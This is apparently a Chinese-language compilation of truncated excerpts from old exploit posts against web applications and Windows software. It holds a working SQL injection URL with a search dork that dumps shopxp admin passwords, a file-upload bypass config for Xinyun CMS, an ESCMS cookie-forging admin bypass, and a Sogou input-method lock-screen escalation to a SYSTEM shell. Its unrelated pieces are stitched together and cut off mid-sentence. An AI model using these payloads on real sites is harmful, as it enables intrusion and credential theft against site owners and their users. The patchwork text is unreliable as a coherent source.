原理和Nginx一样，上图
 

今天在中国站长网发现一个今天更新的程序，这程序是2009-12-10 13:05:53一点钟更新的，到我现在写这文章为止20.15分已经有云起企业建站系统CommonSite下载地址(已被下载8699次) 那么大的下载量了，我觉得这程序应该可以吧，后初步分析一下，这程序问题较大,
下面是该程序下载地址http://down.chinaz.com/soft/22462.htm
...

漏洞版本：shopxp网上购物系统 v7.4
关键词：inurl:shopxp_news.asp
shopxp_news.asp
暴密码的语句：
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
 

...

偶然路过一个php的站，由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ，不是大型的CMS，习惯性的在后面加了个“'”，没想到爆错了！

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

//您已经在您的SQL语法错误，检查手册，对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

...

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。
...

影响版本：新云4.0最新

漏洞描述：

把下面配置文件保存为（xunyun.seraph)

url=http://localhost/users/upload.asp?action=save&ChannelID=1&sType=

filefield=File1

filefield2=

filename=200981623554.cer;.gif

filename2=

...

版本:ESCMS V1.0 SP1 Build 1125
后台登陆验证是通过admin/check.asp实现的,看代码


<%
if Request.cookies(CookiesKey)("ES_admin")="" then 
''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
...

简单说下利用的方法吧。
点击图片上传后会出现上传页面，地址为

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的图片上传后，地址为
...

测试环境：
OS: windows 7 ultimate
搜狗输入法 4.3 正式版

漏洞过程描述：
当windows加载了搜狗输入法后（登录系统后），锁定计算机(cltr alt del)。切换为搜狗输入法，输入拼音字母出现搜狗输入法工具条后，点击搜索，会调用 iexplorer.exe 。接下来就可以直接在IE地址栏调用system32目录并运行cmd，如果登录账号为administrators 组。则直接获取本机系统权限。

...